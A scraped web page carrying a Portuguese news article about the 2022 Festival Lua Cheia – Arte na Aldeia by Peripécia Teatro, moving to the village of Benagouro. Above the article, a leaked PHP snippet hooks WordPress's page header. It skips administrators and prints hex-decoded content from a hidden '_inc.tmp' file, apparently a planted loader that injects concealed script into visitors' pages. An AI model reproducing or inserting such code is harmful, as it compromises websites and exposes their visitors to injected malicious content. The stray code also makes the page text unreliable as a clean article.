if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Festival Lua Cheia - artesentreasletras.com.pt

Festival Lua Cheia

Foto: D.R.

O Festival Lua Cheia – Arte na Aldeia – uma iniciativa promovida pela Peripécia Teatro e que procura colocar a arte em diálogo com o espaço e a comunidade rural – está de regresso para mais uma edição. Desta feita, o evento, que mantém as suas raízes em Vila Real, irá “iluminar” a aldeia de Benagouro, que passará a acolher o novo espaço de criação da cooperativa cultural: a Sala Peripécia. A edição de 2022 do Festival, que irá decorrer entre 11 e 17 de Julho, conta com a apresentação de cinco espetáculos de teatro, duas sessões de cinema e, ainda, a estreia da reportagem “Fabricar uma Peça”, do realizador Ramón de Los Santos. O evento irá acolher, também, a inauguração da obra “O Mapa”, da artista Paula Magalhães.
A edição deste ano do Festival Lua Cheia – Arte na Aldeia assinala o início de um novo capítulo na história da Peripécia Teatro. A companhia, que está, desde 2007 instalada na antiga escola primária de Coêdo, em Vila Real, passará, agora, a contar com um novo espaço de criação: o Centro Cultural e Recreativo de Benagouro.